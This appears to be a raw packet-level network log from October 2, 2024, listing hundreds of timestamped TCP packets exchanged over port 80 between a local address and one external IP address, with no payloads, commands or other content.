                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.114981890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.115004063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.115015984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.115027905 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.115046024 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.115163088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.115175009 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.115226030 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.223375082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.223392963 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.223407030 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.223453045 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.223464012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.223674059 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224037886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224065065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224076033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224101067 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224194050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224237919 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224322081 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224416971 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224456072 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224483013 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224493027 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224526882 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224704027 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224786997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224797964 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224849939 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224900961 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224912882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.224936962 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225353003 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225394964 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225399017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225410938 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225450993 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225550890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225562096 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225573063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225584984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225609064 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.225636959 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226279974 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226299047 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226310968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226334095 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226500988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226511955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226521969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226535082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226537943 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.226557970 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227124929 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227168083 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227170944 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227183104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227214098 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227293015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227391005 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227402925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227413893 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227431059 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.227442980 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.228007078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.228050947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.228132963 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.228143930 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.228173971 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.228487968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.272901058 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314455032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314474106 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314486027 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314497948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314511061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314524889 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314572096 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314667940 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314717054 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314734936 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314749002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314789057 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314830065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314842939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314855099 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314867973 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314877987 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.314908028 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315018892 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315107107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315172911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315212011 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315259933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315272093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315304041 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315408945 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315419912 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315433025 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315447092 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315454960 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315470934 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315632105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315644979 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315655947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315670013 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.315696955 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316004038 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316091061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316102982 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316137075 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316178083 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316190958 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316231966 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316329002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316340923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316353083 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316365004 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316381931 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316464901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316529989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316541910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316554070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316572905 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316596985 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.316957951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317023039 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317034960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317070007 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317157984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317171097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317182064 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317193985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317202091 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317219019 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317408085 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317431927 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317435026 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317440033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317446947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317467928 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317492962 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317898035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317961931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.317975044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318013906 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318119049 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318130970 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318140984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318152905 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318160057 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318181038 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318455935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318468094 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318479061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318492889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318499088 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318507910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318519115 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318547010 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.318859100 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319293022 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319309950 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319320917 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319331884 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319341898 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319344044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319360018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319365025 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.319375038 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.366667032 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404041052 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404059887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404069901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404110909 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404117107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404162884 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404825926 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404911041 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404921055 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404930115 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404953003 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.404983997 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405033112 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405117989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405128002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405139923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405189037 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405189037 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405235052 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405244112 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405275106 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405432940 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405446053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405477047 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405487061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405492067 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405498981 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405513048 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405601978 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405611992 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405653000 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405683994 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405694008 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405716896 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405828953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405838966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405846119 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405854940 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405867100 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405880928 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.405905008 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406059980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406071901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406085968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406096935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406121016 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406136036 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406369925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406384945 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406394958 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406405926 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406418085 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406420946 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406444073 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406629086 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406678915 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406709909 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406723976 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406733990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406745911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406754971 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406758070 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406778097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406780958 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406789064 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406800032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406814098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406816006 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406820059 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406826973 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406841040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.406873941 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407284975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407336950 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407347918 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407358885 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407371998 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407396078 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407455921 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407468081 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407479048 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407490969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407505035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407506943 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407516956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407520056 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407530069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407541990 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407578945 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407711029 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407722950 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407763958 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407845020 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407855988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.407866001 CEST8049711147.45.44.104192.168.2.6
